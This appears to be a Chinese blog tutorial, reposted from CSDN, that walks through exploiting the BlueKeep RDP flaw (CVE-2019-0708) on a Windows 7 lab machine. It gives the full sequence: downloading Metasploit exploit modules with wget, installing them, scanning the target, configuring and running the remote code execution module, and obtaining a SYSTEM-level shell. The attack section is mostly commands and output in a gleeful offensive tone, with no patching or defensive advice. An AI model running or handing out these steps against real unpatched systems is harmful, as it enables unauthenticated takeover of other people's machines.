kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7

一、漏洞说明
2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。

目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试已经可以远程代码执行。

二、影响版本
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp

换个说法就是除了win8和win10,几乎所有版本都有此漏洞

三、开始攻击
依旧是我们的老演员:
kali机:192.138.198.134
win7:192.168.198.138

准备工作:

win7
1.关闭win7防火墙
2.开启3389端口(远程桌面连接)
3.静坐,待被日

kali:
1.更新你的msf(如果你的kali版本是2019.4及其以后的,可以跳过这步)

apt-get install metasploit-framework -->更新metasploit

2.下载此漏洞的exp

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

3.将下载的文件添加或替换到相应目录

rdp.rb  - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb -->替换
rdp_scanner.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb -->替换
cve_2019_0708_bluekeep.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb -->替换
cve_2019_0708_bluekeep_rce.rb  - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb -->添加

正式开始
启动msfconsole,搜索0708特征码

msfconsole -->启动msf
search 0708 -->搜索关于0708的所有文件或模块

在这里插入图片描述
请看编号0

auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->探测此漏洞模块

我们来使用它探测一下并查看它需要哪些参数

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->使用此模块
show options -->查看所需参数

在这里插入图片描述
这里我们发现所有为yes的参数里面只有RHOSTS(主机地址)为空,那么我们来设置一下靶机的主机地址

set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
exploit -->开始攻击

在这里插入图片描述
几秒钟后得到了结果
请看倒数第5排:
The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.

懒得翻译,自己百度去,反正大意就是此主机可能受到此漏洞攻击

既然有漏洞了,那我们就开始攻击
请看图1的编号3

exploit/windows/rdp/cve_2019_0708_bluekeep_rce

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce -->使用攻击模块
show options -->查看所需参数
 set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
 set target 2 -->设置受害机器的架构(可选参数0-7)

在这里插入图片描述
这里不同以往,需要设置架构参数,小朋友们不要忘了哦
参数设置好以后就可以开始攻击了

exploit -->开始攻击

在这里插入图片描述
当出现Command shell session 1 opened时,证明你已经攻击成功了
此时你只需要按下回车便可
我们来查看一下效果
在这里插入图片描述
运行whoami,回显系统权限
运行ipconfig,回显192.168.198.138

好的,成功拿下
啧啧,我们可怜的win7

老话常说
有什么不懂的欢迎私信
如果我有哪点没讲清楚的,欢迎评论

发布了7 篇原创文章 · 获赞 6 · 访问量 1583

猜你喜欢

转载自blog.csdn.net/sievr/article/details/104294349